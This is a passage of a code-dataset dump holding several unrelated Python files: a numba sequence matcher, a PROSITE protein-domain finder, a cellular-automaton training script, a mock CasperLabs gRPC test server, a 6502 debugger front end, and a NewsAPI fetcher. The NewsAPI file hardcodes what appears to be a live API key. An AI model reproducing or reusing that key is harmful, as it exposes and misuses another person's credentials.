list_match_counts) # type: ignore\n\n\n@nb.jit(nopython=True)\ndef match_sequence_here(\n pat: \"PatternInfo\",\n pat_pos: \"int\",\n events: \"ak.Array\",\n events_pos: \"int\",\n cut_match_indices: \"np.ndarray\",\n cut_match_counts: \"np.ndarray\",\n) -> \"bool\":\n \"\"\"Match the events in the sequence starting at the given position of the pattern.\n\n NOTE: This routine is put into the generated file for matching a specific pattern,\n and then jit compiled.\n \"\"\"\n\n min_to_match = pat.event_min_counts[pat_pos]\n max_to_match = pat.event_max_counts[pat_pos]\n num_events = len(events)\n\n pos = events_pos\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < events_pos + min_to_match:\n # more events to match than present in the sequence\n if pos >= num_events:\n return False\n if not match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n return False\n pos += 1\n cut_match_indices[pat_pos] = events_pos\n cut_match_counts[pat_pos] = min_to_match\n\n pos_limit = num_events\n if max_to_match > 0:\n pos_limit = min(pos_limit, events_pos + max_to_match)\n\n # check if the pattern has more events left to match\n assert pos == events_pos + min_to_match\n if pat_pos < pat.length - 1:\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < pos_limit:\n if match_sequence_here(\n pat, pat_pos + 1, events, pos, cut_match_indices, cut_match_counts\n ):\n # if the rest of the pattern matches rest of the sequence, we have a match\n # since we already matched min_count copies of current event\n return True\n elif match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n # we have some leeway to match more of the current event\n cut_match_counts[pat_pos] += 1\n pos += 1\n else:\n # we couldn't match any further of the pattern\n return False\n\n # we have matched all copies of the current event, onto the next\n if pos < num_events:\n # the sequence has more events to match to\n if match_sequence_here(\n pat, pat_pos + 1, events, pos, cut_match_indices, cut_match_counts\n ):\n return True\n else:\n return False\n else:\n # no events left in the sequence but the pattern has more left\n return False\n else:\n # pattern has no more events to match, so match as many of the current event as feasible\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < pos_limit:\n if not 
match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n break\n else:\n pos += 1\n cut_match_indices[pat_pos] += 1\n\n # check if the pattern needed to match at the end of the sequence\n if pat.match_seq_end and pos < num_events:\n return False\n else:\n return True\n\n\n# -----------------------------------------------------------\n# matching sequences and extracting the matched subsequences\n# -----------------------------------------------------------\n\n\ndef get_full_offsets_n_records(content: ak_layout.Content):\n \"\"\"Events is an array with layout as a list-type content, or the same\n thing wrapped under one or more IndexedArray or UnmaskedArray.\n \"\"\"\n from awkward._util import listtypes\n\n if not isinstance(content, listtypes):\n return get_full_offsets_n_records(content.content)\n else:\n if isinstance(content, ak_layout.RegularArray):\n starts = np.arange(0, len(content.content), content.size)\n return (starts, starts + content.size, content.content)\n else:\n return (\n np.asarray(content.starts),\n np.asarray(content.stops),\n content.content,\n )\n\n\ndef extract_pattern(pat: SeqPattern, sequences: ak.Array) -> ak.Array:\n \"\"\"Extract the pattern from the sequences to yield new sequences.\"\"\"\n\n match_res = match_pattern(pat, sequences)\n select_indices = match_res[\"seq_id\"]\n\n matched_sequences: ak.Array = sequences[select_indices] # type: ignore\n matched_events: ak.Array = matched_sequences[\"events\"] # type: ignore\n\n # we still need to subset the events for each sequence\n events_length = ak.num(matched_events)\n start_at = (\n ak.zeros_like(events_length)\n if pat.idx_start_event is None\n else match_res[\"evt_indices\"][:, pat.idx_start_event] # type: ignore\n )\n end_excl_at = (\n events_length\n if pat.idx_end_event is None\n else match_res[\"evt_indices\"][:, pat.idx_end_event] # type: ignore\n + match_res[\"evt_counts\"][:, pat.idx_end_event] # type: ignore\n )\n\n # the original events array is a ListOffsetArray or ListArray, so pull out the offsets off it\n full_starts, full_ends, full_content = get_full_offsets_n_records(\n matched_events.layout\n )\n select_starts = full_starts[select_indices] + start_at\n select_ends = full_starts[select_indices] + end_excl_at\n assert np.all(\n select_ends <= full_ends[select_indices]\n ), \"shame, your math is incorrect\"\n subset_matched_events = ak.Array(\n ak_layout.ListArray64(\n ak_layout.Index64(select_starts),\n ak_layout.Index64(select_ends),\n full_content,\n )\n )\n assert ak.is_valid(subset_matched_events)\n matched_sequences[\"events\"] = subset_matched_events\n\n return matched_sequences\n", "repo_name": "ananis25/seqmatcher", "sub_path": "src/seqmatcher/matching_jitted.py", "file_name": "matching_jitted.py", "file_ext": "py", "file_size_in_byte": 14504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numba.int64", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numba.experimental", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 63, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": 
"numpy.int64", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 79, "usage_type": "attribute"}, {"api_name": "inspect.getsource", "line_number": 103, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 108, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 109, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numba.typeof", "line_number": 112, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 113, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 114, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 114, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 116, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 117, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 118, "usage_type": "call"}, {"api_name": "numba.int64", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 130, "usage_type": "call"}, {"api_name": "numba.int64", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 154, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 168, "usage_type": "name"}, {"api_name": "numba.typed.List", "line_number": 184, "usage_type": "call"}, {"api_name": "numba.typed.List", "line_number": 185, "usage_type": "call"}, {"api_name": "numba.typed.List", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 263, "usage_type": "call"}, {"api_name": "awkward.layout.Content", "line_number": 351, "usage_type": "attribute"}, {"api_name": "awkward.layout", "line_number": 351, "usage_type": "name"}, {"api_name": "awkward._util.listtypes", "line_number": 357, "usage_type": "argument"}, {"api_name": "awkward.layout.RegularArray", "line_number": 360, "usage_type": "attribute"}, {"api_name": 
"awkward.layout", "line_number": 360, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 366, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 371, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 377, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 378, "usage_type": "attribute"}, {"api_name": "awkward.num", "line_number": 381, "usage_type": "call"}, {"api_name": "awkward.zeros_like", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 400, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 403, "usage_type": "call"}, {"api_name": "awkward.layout.ListArray64", "line_number": 404, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 404, "usage_type": "name"}, {"api_name": "awkward.layout.Index64", "line_number": 405, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 405, "usage_type": "name"}, {"api_name": "awkward.layout.Index64", "line_number": 406, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 406, "usage_type": "name"}, {"api_name": "awkward.is_valid", "line_number": 410, "usage_type": "call"}]} +{"seq_id": "2169666519", "text": "from newsapi import NewsApiClient\n\ndef get_news_for_dashboard():\n newsapi = NewsApiClient(api_key='9536ddc288774f5f9d473fceff05d46a')\n all_articles = newsapi.get_everything(q='bangladesh',\n language='en')\n\n data = all_articles[\"articles\"]\n\n\n ret = {}\n for i in range(0,8):\n temp = {}\n temp[\"source\"] = data[i][\"source\"][\"name\"]\n temp[\"title\"] = data[i][\"title\"]\n temp[\"description\"] = data[i][\"description\"]\n temp[\"url\"] = data[i][\"url\"]\n temp[\"image\"] = data[i][\"urlToImage\"]\n ret[str(i)]=temp\n\n return ret", "repo_name": "SaqibHasan057/Fake_News_ICT_App", "sub_path": "fake_news_app/library/news_api.py", "file_name": "news_api.py", "file_ext": "py", "file_size_in_byte": 615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "newsapi.NewsApiClient", "line_number": 4, "usage_type": "call"}, {"api_name": "newsapi.get_everything", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "37779248896", "text": "import torch as th\nimport torchvision as thv\nfrom PIL import Image\nimport numpy as np\nfrom model_def import RImNN\n\n## EX DESC\n# NOTE create pool of samples initialize grid with zeros except cell in the center\n# NOTE cell's going to has all channels set to 1 except RGB\n# NOTE sample specified number of batches from the pool\n# NOTE apply update rule random number of times\n# NOTE apply L2 loss for each pixel between output img and target img to regenerate\n# NOTE replace one with the highest loss to freshly seeded sample\n# NOTE as in RNNs differentiably optimize parameters \n\nif __name__==\"__main__\":\n\n #CONSTANTS \n WIDTH = 8\n HEIGHT = 8\n CHANNEL_COUNT = 16 # RGB, A - indicate if cell alive, .. 
12 <- space for nn information\n POOL_SIZE = 256\n BATCH_SIZE = 8\n\n #LOADING TARGETS\n target_img = np.array(Image.open(\"../Images/place_1.png\"))\n assert(tuple(target_img.shape) == (WIDTH, HEIGHT, 4))\n\n WIDTH, HEIGHT, CHANNEL_COUNT = target_img.shape\n assert(CHANNEL_COUNT == 4)\n\n CHANNEL_COUNT += 12\n\n target_img = np.moveaxis(target_img, 2, 0)\n target_img = target_img[None , ...]\n target_img = th.from_numpy(target_img)\n target_img = target_img.float() / 255.\n\n #CREATING POOL\n seed = th.zeros(CHANNEL_COUNT, WIDTH, HEIGHT)\n seed[3:, WIDTH//2, HEIGHT//2] = 1.0\n pool = th.repeat_interleave(seed[None, ...], POOL_SIZE, dim=0)\n pool_losses = th.rand(POOL_SIZE)\n \n #DEFINE MODEL LOSS AND OPTIMIZER \n model = RImNN(WIDTH, HEIGHT, CHANNEL_COUNT, BATCH_SIZE)\n model.train()\n loss_fn = th.nn.MSELoss()\n optimizer = th.optim.Adam(model.parameters(), lr=2e-3) # 1e-3\n\n ##DEF. TRAIN STEP\n def train_step(X):\n num = int(np.random.uniform(POOL_SIZE, 96))\n optimizer.zero_grad()\n for _ in range(num):\n X = model(X)\n loss = loss_fn(X[:, 0:4, ...], target_img)\n loss.backward()#retain_graph=True)\n\n optimizer.step() \n return X, loss\n\n #TRAINING\n def train():\n for _ in range(1800):\n indices = th.randint(0, POOL_SIZE, (BATCH_SIZE,))\n X = pool[indices, ...].clone().detach()\n X_losses = pool_losses[indices, ...].clone().detach()\n with th.no_grad():\n X_worst_index = th.argmax(X_losses)\n X[X_worst_index] = seed\n \n Y, loss = train_step(X)\n\n del X\n del X_losses\n\n pool[indices, ...] = Y\n pool_losses[indices, ...] = loss\n del indices\n\n print(f\"{loss.item()}\")\n\n #if(loss.item() <= 0.1):\n # break\n\n del Y\n del loss\n\n \n\n train()\n th.save(model.state_dict(), \"../Models/ex1Model.pth\")\n", "repo_name": "JungerBoyo/imrsim", "sub_path": "src_pth/ex1.py", "file_name": "ex1.py", "file_ext": "py", "file_size_in_byte": 2526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.moveaxis", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.repeat_interleave", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 43, "usage_type": "call"}, {"api_name": "model_def.RImNN", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.randint", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "42954967606", "text": "#!/usr/bin/env python3\n# -*-coding: 
utf-8-*-\n\n#MODULES###########################################################################\n\nimport os\nimport re\nimport sys\n\nfrom Bio import SeqIO\nfrom Bio.ExPASy import Prosite, Prodoc\n\n\ndef translator(domain):\n\n \"\"\"\n This function changes the regular expression format from Prosite to the Python\n one of the string given. \n \"\"\"\n\n dom = (str(domain).upper().replace(\".\", \"\").replace(\"-\", \"\").replace(\"X\", \".\"\n\t\t).replace(\"{\", \"[^\").replace(\"}\", \"]\").replace(\"<\", \"^\").replace(\">\", \"$\"\n\t\t).replace(\"(\", \"{\").replace(\")\", \"}\"))\n return dom\n\n\ndef results(output_file, id, name, accession, description, pattern, sequence):\n\n \"\"\"\n This function writes in the output file the results if there is any match \n between the domain and the sequence. \n Arguments: output file; domain ID, name, accession, description, pattern;\n and the sequence to analyze in each case. \n \"\"\"\n\n sys.stdout = open(output_file, 'a')\n\n print(\"\\nRESULTS \"+id + \":\")\n print(\"------------------------------------------------------------------\")\n print(\"OBTAINED DOMAIN: \")\n print(\"Name: \"+name)\n print(\"Accession: \"+accession)\n print(\"Description: \"+description)\n print(\"Found pattern: \"+pattern)\n print(\"Protein's domain: \" +\n str(re.findall(pattern, sequence)[0]).replace('\"', \"\"))\n match = re.search(pattern, sequence)\n print(\"Domain position: \" + str(match.start())+\"-\"+str(match.end()))\n print(\"------------------------------------------------------------------\\n\")\n\n\ndef no_results(output_file, id):\n\n \"\"\"\n This function prints the results if there isn't any match between the domain\n\tand the sequence. \n Arguments: output file name, domain ID\n \"\"\"\n\n sys.stdout = open(output_file, 'a')\n\n print(\"\\nRESULTS \"+id + \":\")\n print(\"---------------------------------------------------------------------\")\n print(\"No matching domain found.\")\n print(\"---------------------------------------------------------------------\")\n\n\ndef domains_finder(input_file, database, output_file):\n\t\n \"\"\"\n This function checks sequence by sequence if there is any matched domain\n\tpresent in the prosite database (.dat). \n Arguments: file which contains the sequences, database, output_file name. 
\n \"\"\"\n\n check = 0\n\n with open(input_file) as handle2:\n for recordBlast in SeqIO.parse(handle2, \"fasta\"):\n check = 0\n\n # Variable which contains the sequence\n subject_seqs = str(recordBlast.seq)\n\n with open(database, 'r') as handle:\n for recordD in Prosite.parse(handle):\n\n # Variable which contains the \"translated\" domain\n a = translator(recordD.pattern)\n\n if re.search(a, subject_seqs) and recordD.pattern != \"\":\n\n results(output_file, recordBlast.id, recordD.name,\n recordD.accession, recordD.description, a, \n\t\t\t\t\t\t\t\tsubject_seqs)\n check = 1\n\n if check == 0:\n no_results(output_file, recordBlast.id)\n\n sys.stdout.close()\n sys.stdout = open(\"/dev/stdout\", \"w\")\n", "repo_name": "Andrea290799/Blast-Muscle-Prosite-Analysis", "sub_path": "PROSITE.py", "file_name": "PROSITE.py", "file_ext": "py", "file_size_in_byte": 3207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Bio.SeqIO.parse", "line_number": 79, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 79, "usage_type": "name"}, {"api_name": "Bio.ExPASy.Prosite.parse", "line_number": 86, "usage_type": "call"}, {"api_name": "Bio.ExPASy.Prosite", "line_number": 86, "usage_type": "name"}, {"api_name": "re.search", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout.close", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}]} +{"seq_id": "35396387807", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMock gRPC server (node) used in Python client's unit tests suite.\n\"\"\"\nfrom concurrent import futures\nimport time\nimport grpc\n\nfrom casperlabs_client import CasperMessage_pb2\nfrom casperlabs_client import CasperMessage_pb2_grpc\nfrom casperlabs_client import casper_pb2_grpc\nfrom casperlabs_client import empty_pb2\n\nCL_GRPC_PORT_EXTERNAL = 3477\n\nHASH = \"d9d087fe5d22dbfa1bacb57d6da8d509f7191a216cee6a971de32463ff0f284f\"\n\nSAMPLE_DOT = \"\"\"\ndigraph \"dag\" {\n rankdir=BT\n node [width=0 height=0 margin=0.03 fontsize=8]\n splines=false\n subgraph \"cluster_\" {\n label = \"\"\n \"d9d087fe5d...\" [style=filled shape=box]\n \"1_\" [style=invis shape=box]\n \"2_\" [style=invis shape=box]\n \"3_\" [style=invis shape=box]\n \"4_\" [style=invis shape=box]\n \"5_\" [style=invis shape=box]\n \"d9d087fe5d...\" -> \"1_\" [style=invis]\n \"1_\" -> \"2_\" [style=invis]\n \"2_\" -> \"3_\" [style=invis]\n \"3_\" -> \"4_\" [style=invis]\n \"4_\" -> \"5_\" [style=invis]\n }\n subgraph \"cluster_9dfcf4f851...\" {\n label = \"9dfcf4f851...\"\n \"0_9dfcf4f851...\" [style=invis shape=box]\n \"30baf73717...\" [shape=box]\n \"33c8b59ddd...\" [shape=box]\n \"9bae467c70...\" [shape=box]\n \"5736298633...\" [shape=box]\n \"7f12df896d...\" [shape=box]\n \"0_9dfcf4f851...\" -> \"30baf73717...\" [style=invis]\n \"30baf73717...\" -> \"33c8b59ddd...\" [style=invis]\n \"33c8b59ddd...\" -> \"9bae467c70...\" [style=invis]\n \"9bae467c70...\" -> \"5736298633...\" [style=invis]\n \"5736298633...\" -> \"7f12df896d...\" [style=invis]\n }\n \"7f12df896d...\" -> \"5736298633...\" 
[constraint=false]\n \"30baf73717...\" -> \"d9d087fe5d...\" [constraint=false]\n \"33c8b59ddd...\" -> \"30baf73717...\" [constraint=false]\n \"9bae467c70...\" -> \"33c8b59ddd...\" [constraint=false]\n \"5736298633...\" -> \"9bae467c70...\" [constraint=false]\n}\n\n\"\"\"\n\n\nclass CasperServiceServicer(casper_pb2_grpc.CasperServiceServicer):\n \"\"\"CasperService is the way for user and dApp developer to interact with the system,\n including deploying contracts, looking at the DAG and querying state.\n \"\"\"\n\n def Deploy(self, request, context):\n \"\"\"Add a deploy to the deploy pool on the node,\n to be processed during subsequent block proposals.\n \"\"\"\n context.set_code(grpc.StatusCode.OK)\n context.set_details(\"\")\n return empty_pb2.Empty()\n\n def GetBlockInfo(self, request, context):\n \"\"\"Get the block summary with extra information about finality.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")\n\n def StreamBlockInfos(self, request, context):\n \"\"\"Get slices of the DAG, going backwards, rank by rank.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")\n\n\nclass DeployServicer(CasperMessage_pb2_grpc.DeployServiceServicer):\n def DoDeploy(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n context.set_details(\"\")\n return CasperMessage_pb2.DeployServiceResponse()\n\n def createBlock(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.DeployServiceResponse()\n\n def showBlock(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.BlockQueryResponse()\n\n def visualizeDag(self, request, context):\n \"\"\"Get DAG in DOT format.\n \"\"\"\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.VisualizeBlocksResponse()\n b.content = SAMPLE_DOT\n return b\n\n def showMainChain(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.BlockInfoWithoutTuplespace()\n\n def showBlocks(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.BlockInfoWithoutTuplespace()\n b.blockHash = HASH\n yield b\n\n def findBlockWithDeploy(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.BlockQueryResponse()\n b.status = \"SUCCESS\"\n return b\n\n def queryState(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.QueryStateResponse()\n\n\n####\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n CasperMessage_pb2_grpc.add_DeployServiceServicer_to_server(DeployServicer(), server)\n port = \"[::]:\" + str(CL_GRPC_PORT_EXTERNAL)\n server.add_insecure_port(port)\n server.start()\n try:\n while True:\n time.sleep(60 * 60)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == \"__main__\":\n serve()\n", "repo_name": "CasperLabs/client-py", "sub_path": "tests/mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 4829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "casperlabs_client.casper_pb2_grpc.CasperServiceServicer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "casperlabs_client.casper_pb2_grpc", "line_number": 62, "usage_type": "name"}, {"api_name": 
"grpc.StatusCode", "line_number": 71, "usage_type": "attribute"}, {"api_name": "casperlabs_client.empty_pb2.Empty", "line_number": 73, "usage_type": "call"}, {"api_name": "casperlabs_client.empty_pb2", "line_number": 73, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 78, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 85, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc.DeployServiceServicer", "line_number": 90, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc", "line_number": 90, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 92, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.DeployServiceResponse", "line_number": 94, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 94, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 97, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.DeployServiceResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 98, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 101, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockQueryResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 102, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 107, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.VisualizeBlocksResponse", "line_number": 108, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 108, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 113, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockInfoWithoutTuplespace", "line_number": 114, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 114, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 117, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockInfoWithoutTuplespace", "line_number": 118, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 118, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 123, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockQueryResponse", "line_number": 124, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 124, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 129, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.QueryStateResponse", "line_number": 130, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 130, "usage_type": "name"}, {"api_name": "grpc.server", "line_number": 137, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 137, "usage_type": "call"}, {"api_name": "concurrent.futures", "line_number": 137, "usage_type": "name"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc.add_DeployServiceServicer_to_server", "line_number": 138, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc", "line_number": 138, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "72571981926", "text": 
"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"Arduino-Mega-6502: Programmer and Debugger for 6502 Ben Eater inspired 8-bit Computer\nby Robert Fromm, February 2021\n\nMain program.\n\"\"\"\n\n\nimport msvcrt\nimport os\nimport threading\nimport time\n\nimport coloredlogs\n\nfrom assembly_actions import AssemblyActions\nfrom bus_actions import BusActions\nfrom help_actions import HelpActions\nfrom myprint import myprint, myprint_warning\nfrom py6502.dis6502 import dis6502\nfrom serial_actions import SerialActions\nfrom serial_thread import SerialThread\n\n\ndef kbfunc():\n \"\"\"Keypress detection. Works only on windows\n source: https://stackoverflow.com/questions/292095/polling-the-keyboard-detect-a-keypress-in-python\n\n Returns:\n int: key code or 0 if no key was pressed\n \"\"\"\n return ord(msvcrt.getch()) if msvcrt.kbhit() else 0\n\n\n# enable colored logs to ensure the colors are rendered correctly on consoles\n# (e.g. Git Bash, Windows CMD)\ncoloredlogs.install()\n\n\nclass Main():\n \"\"\"Main Function\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\n Defines the properties.\n \"\"\"\n self.args = HelpActions.get_args() # CLI arguments\n self.portname: str = None # Name of serial port connected to\n self.serial_thread: SerialThread = None # SerialThread of serial port\n self.assembly_file: str = None # Assembly or binary file name\n self.binary: list = None # Binary content (0x8000 to 0xFFFF) of current file\n self.disasm: dis6502 = None # Py6502 Dissambler object for Opcode line interpretation\n self.stop_event = threading.Event() # Stop event\n self.auto_single_step = False # True, if autostepping is active\n self.next_single_step_time = 0 # Next timestamp (time.time()) an auto-step has to be made\n\n def run(self):\n \"\"\"Starts the Program.\n \"\"\"\n # Select Portname\n self.portname = SerialActions.port_select(self.args)\n if self.portname is None:\n self.exit()\n return\n\n # Connect to serial port\n result = SerialActions.connecting(self.portname, self.args)\n if not result.success:\n self.exit_on_error()\n return\n self.serial_thread: SerialThread = result.serial_thread\n\n # Open Assembly File\n self.select_assembly()\n if self.assembly_file is None:\n self.exit()\n return\n\n # Print Help\n HelpActions.print_help()\n\n # Main Loop\n try:\n while not self.stop_event.wait(1e-3) and self.serial_thread.is_connected():\n key = kbfunc()\n if key:\n # ignore additional key presses\n while kbfunc():\n pass\n self.on_key_pressed(key)\n\n BusActions.update(self.serial_thread, self.disasm)\n\n # Auto stepping\n if self.auto_single_step and self.next_single_step_time < time.time():\n BusActions.send_api_single_step(self.serial_thread)\n self.next_single_step_time = time.time() + self.args.ass_delay\n\n except KeyboardInterrupt:\n pass\n\n # Exiting\n if self.serial_thread.is_connected():\n self.exit()\n else:\n 